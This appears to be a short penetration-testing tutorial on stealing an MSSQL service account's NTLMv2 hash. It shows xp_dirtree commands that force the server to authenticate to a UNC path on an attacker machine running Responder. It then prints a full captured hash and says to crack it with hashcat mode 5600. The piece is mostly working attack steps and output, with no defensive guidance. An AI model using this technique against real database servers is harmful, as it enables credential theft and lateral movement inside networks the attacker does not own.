Today, I am going to share interesting creds stealing on MSSQL services credentials. Maybe someday’s you get stuck during your penetration testing even though you have a compromised MSSQL server credential. Perhaps you are in a situation where you cannot find any interesting information in the database. In this tutorial, I would share another simple idea when you get stuck.
Another thing to do when you get stuck is to steal the MSSQL services account which maybe usefull to go ahead your lateral movement. The attack is to use the xp_dirtree functionality to browse file in your hacking machine that is running responder which will force the server to authenticate and give the authentication token
Example: SQL> xp_dirtree 'C:\Users',0,1;
Xp_dirtree has three parameters:
- directory – This is the directory you pass when you call the stored procedure;.
- depth – This tells the stored procedure how many subfolder levels to display. The default of 0 will display all subfolders.
- file – This will either display files as well as each folder. The default of 0 will not display any files.
You can also use the xp_dirtree to browse UNC path for example
SQL> xp_dirtree '\\10.10.14.3\rio'
With that capability you can run responder on your attacker machine to get the token
[SMB] NTLMv2-SSP Client : 192.168.2.19 [SMB] NTLMv2-SSP Username : RIO-SERVER\mssql-svc [SMB] NTLMv2-SSP Hash : mssql-svc::RIO-SERVER:289968fad4d78dd3:E17B1EAFFEB1C5C10E592B9183112AE9:0101000000000000C0653150DE09D20161ED4A9AEC7A34ED000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D20106000400020000000800300030000000000000000000000000300000AB3E23C5E851A2FE97C9C868B5C33C0B6909534D1F15CD7272C67F3AAFA95D950A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E003300000000000000000000000000
With that hash then you can do hashcat cracking with the hash type 5600. Happy cracking ..